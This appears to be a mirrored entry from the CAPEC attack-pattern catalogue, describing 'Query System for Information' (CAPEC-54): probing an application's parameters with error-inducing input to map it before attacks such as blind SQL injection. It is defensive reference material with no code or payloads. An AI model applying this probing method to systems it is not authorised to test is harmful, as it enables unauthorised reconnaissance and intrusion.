Dark Mode

Settings

Capec-54 Detail

Query System for Information

Standard Software Likelihood: High Typical Severity: Low

Parents: 116

Children: 95 127 215 261 462

Threats: T60 T65 T258 T273 T277 T291 T302 T340 T383 T396

Description

An adversary, aware of an application's location (and possibly authorized to use the application), probes an application's structure and evaluates its robustness by submitting requests and examining responses. Often, this is accomplished by sending variants of expected queries in the hope that these modified queries might return information beyond what the expected set of queries would provide.

Not present

External ID Source Link Description
CAPEC-54 capec https://capec.mitre.org/data/definitions/54.html
CWE-209 cwe http://cwe.mitre.org/data/definitions/209.html
Explore

  1. Determine parameters: Determine all user-controllable parameters of the application either by probing or by finding documentation

Experiment

  1. Cause error condition: Inject each parameter with content that causes an error condition to manifest

  2. Modify parameters: Modify the content of each parameter according to observed error conditions

Exploit

  1. Follow up attack: Once the above steps have been repeated with enough parameters, the application will be sufficiently mapped out. The adversary can then launch a desired attack (for example, Blind SQL Injection)

  1. This class of attacks does not strictly require authorized access to the application. As Attackers use this attack process to classify, map, and identify vulnerable aspects of an application, it simply requires hypotheses to be verified, interaction with the application, and time to conduct trial-and-error activities.
  1. The Attacker needs the ability to probe application functionality and provide it erroneous directives or data without triggering intrusion detection schemes or making enough of an impact on application logging that steps are taken against the adversary. The Attack does not need special hardware, software, skills, or access.
Medium
Although fuzzing parameters is not difficult, and often possible with automated fuzzers, interpreting the error conditions and modifying the parameters so as to move further in the process of mapping the application requires detailed knowledge of target platform, the languages and packages used as well as software design.
Confidentiality
Read Data
  1. Blind SQL injection is an example of this technique, applied to successful exploit. See also: CVE-2006-4705
  2. Attacker sends bad data at various servlets in a J2EE system, records returned exception stack traces, and maps application functionality. In addition, this technique allows attackers to correlate those servlets used with the underlying open source packages (and potentially version numbers) that provide them.

We use cookies to ensure you get the best experience on our website.